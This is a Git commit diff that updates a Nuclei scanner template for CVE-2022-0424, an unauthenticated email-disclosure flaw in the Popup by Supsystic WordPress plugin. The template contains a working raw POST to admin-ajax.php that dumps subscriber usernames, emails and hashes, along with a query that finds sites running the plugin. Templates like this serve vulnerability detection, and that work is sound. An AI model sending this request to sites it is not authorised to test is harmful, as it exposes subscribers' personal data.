daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated matchers, info & req type

patch-1
Ritik Chaddha 2024-04-11 10:10:31 +05:30 committed by GitHub
parent ea437826b6
commit 97864a8e5f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 23 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
http/cves/2022/CVE-2022-0424.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2022-0424 id: CVE-2022-0424
info: info:
name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
author: Kazgangap author: Kazgangap
severity: medium severity: medium
description: | description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/ - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
@ -17,32 +18,34 @@ info:
epss-percentile: 0.34103 epss-percentile: 0.34103
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/popup-by-supsystic"
vendor: supsystic vendor: supsystic
product: popup product: popup
framework: wordpress framework: wordpress
tags: wpscan tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/wp-admin/admin-ajax.php" POST /wp-admin/admin-ajax.php HTTP/1.1
headers: Host: {{Hostname}}
Content-Length: "104" Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: "application/json, text/javascript, */*; q=0.01"
X-Requested-With: "XMLHttpRequest" page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
Accept-Encoding: "gzip, deflate"
Accept-Language: "en-US,en;q=0.9"
Connection: "close"
body: |
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '"id":"1","username"' - '"id":"'
- 'email' - 'username":"'
- 'hash' - 'email":'
- 'hash":"'
- '_wpnonce'
condition: and
- type: status - type: status
status: status:
- 200 - 200